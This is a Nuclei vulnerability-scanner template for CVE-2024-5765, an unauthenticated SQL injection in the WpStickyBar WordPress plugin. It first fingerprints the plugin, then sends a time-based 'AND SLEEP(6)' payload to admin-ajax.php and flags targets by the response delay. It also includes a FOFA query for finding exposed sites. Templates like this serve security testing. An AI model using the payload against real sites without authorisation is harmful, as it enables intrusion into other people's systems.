54 lines
1.6 KiB
YAML
54 lines
1.6 KiB
YAML
id: CVE-2024-5765
|
|
|
|
info:
|
|
name: WpStickyBar <= 2.1.0 - SQL Injection
|
|
author: theamanrawat
|
|
severity: high
|
|
description: |
|
|
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection
|
|
reference:
|
|
- https://wpscan.com/vulnerability/0b73f84c-611e-4681-b362-35e721478ba4/
|
|
- https://wordpress.org/plugins/wpstickybar-sticky-bar-sticky-header/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-5765
|
|
classification:
|
|
cve-id: CVE-2024-5765
|
|
cwe-id: CWE-89
|
|
metadata:
|
|
max-request: 2
|
|
verified: true
|
|
fofa-query: body="/plugins/wpstickybar-sticky-bar-sticky-header"
|
|
tags: cve,cve2024,sqli,wpscan,wordpress,wp-plugin,wp,wpstickybar,unauth
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
redirects: true
|
|
max-redirects: 2
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body, "/plugins/wpstickybar-sticky-bar-sticky-header")'
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
@timeout: 15s
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
action=stickybar_display&banner_id=1%20AND%20SLEEP(6);
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "text/html")'
|
|
condition: and
|
|
# digest: 4b0a00483046022100d3a411ab15ed1842f2b50d8fd270085948f17821f7ab725e3c189cc29059173f022100edc106a7f65da186427eb289dedc1c9366359544f9aab6991ecc7831d0b6b2d6:922c64590222798bb761d5b6d8e72950 |